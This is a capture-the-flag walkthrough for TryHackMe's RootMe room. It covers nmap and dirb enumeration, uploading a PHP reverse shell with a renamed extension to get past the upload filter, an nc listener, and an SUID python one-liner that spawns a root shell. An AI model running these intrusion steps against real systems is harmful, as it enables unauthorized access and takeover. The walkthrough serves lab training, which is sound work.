The room is available at https://tryhackme.com/room/rrootme
sudo nmap -sS -p- -T4 x.x.x.x -vv
- -sS for Syn/Stealth Scan
- -p- to scan all 65545 ports
- -T4 for agressive/noisy scan
- -vv for very verbose to monitor the progress of the scan
And we find the following ports open
PORT STATE SERVICE REASON
- 22/tcp open ssh syn-ack ttl 63
- 80/tcp open http syn-ack ttl 63
Now its time to find out what those ports are funning
sudo nmap -sS -sV -p22,80 -T4 10.10.129.163 -vv
-sS for Syn/Stealth scan
-sV for Version scan
-p22,80 -the two open ports we found previously
-T4 for agressive/noisy scan
-vv for very verbose to monitor the progress of the scan
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 80 tells us their is a web server running, lets see what is says.
Not much to see, but lets see if there are any hidden directories
dirb http://x.x.x.x /usr/share/dirb/wordlists/common.txt
- http points it at the server
- /usr/share/dirb/wordlists/common.txt is a list of common directories to try
And the results are
- —- Scanning URL: http://x.x.x.x/ —-
- ==> DIRECTORY: http://x.x.x.x/css/
- + http://x.x.x.x/index.php (CODE:200|SIZE:616)
- ==> DIRECTORY: http://x.x.x.x/js/
- ==> DIRECTORY: http://x.x.x.x/panel/
- + http://x.x.x.x/server-status (CODE:403|SIZE:278)
- ==> DIRECTORY: http://x.x.x.x/uploads/
Visiting http://x.x.x.x/panel/ gives us
and visiting http://x.x.x.x/uploads/gives us
Now lets try a upload a reverse web shell/backdoor to the server and see what happens. A user friendly and popular webshell is available at http://pentestmonkey.net/tools/web-shells/php-reverse-shell – just remember to edit the configuration so it points to your kali machine/vpn machine IP address. And select a port, or you can just leave it at the default 12345.
Uploading the shell.php gives this error message, which means the server is doing some basic checks to try and stop malicious uploads.
But if we change the file extension to something like .php5 or .phtml, it goes through. Then run netcat or ncat in listener mode on your machine with the command
nc -nvlp 4444 or whatever the port you selected.
Then visit http://x.x.x.x/uploads/ and click on your uploaded file and your should then have a shell connected on your machine via netcat.
After that, lets do a quick search for the user.txt file,
find / -type f -name user.txt 2> /dev/null
Now, its time to elevate our permissions to root to get the final flag so lets do a search for files that have a SUID of root. (This means that the files run with the permissions of the file owner, not your login)
find / -user root -perm /4000
You will find multiple files with the correct permissions, but we need a shell. And python fits the bill nicely. So change to the directory where the python executable is located.
With a little google searching, you can find the GTFOBins page at https://gtfobins.github.io/ which curated list of Unix binaries that can used to bypass local security restrictions in misconfigured systems. A quick scroll down the page and you can find the page for GTFOBINS python at https://gtfobins.github.io/gtfobins/python/#suid.
After this, run the command listed on the page.
./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
Then run the whoami command to confirm you are root, and then change to the /root/ directory to find the root.txt flag file